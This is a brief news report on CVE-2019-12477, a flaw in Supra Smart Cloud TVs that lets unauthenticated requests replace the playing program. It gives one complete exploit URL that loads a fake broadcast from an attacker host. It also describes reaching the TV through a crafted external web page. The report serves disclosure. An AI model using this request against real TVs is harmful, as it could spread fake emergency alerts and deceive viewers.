On Supra Smart Cloud TVs Vulnerability (CVE-2019-12477) that allows you to replace the currently viewed program with the content of the attacker. As an example, the output of a fictitious warning about an emergency is demonstrated.
For an attack, it is enough to send a specially designed network request that does not require authentication. In particular, you can call the "/remote/media_control?action=setUri&uri=" handler by specifying the URL of the m3u8 file with video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com/fake_broadcast_message.m3u8".
In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the guise of requesting an image or using the method ).
Source: opennet.ru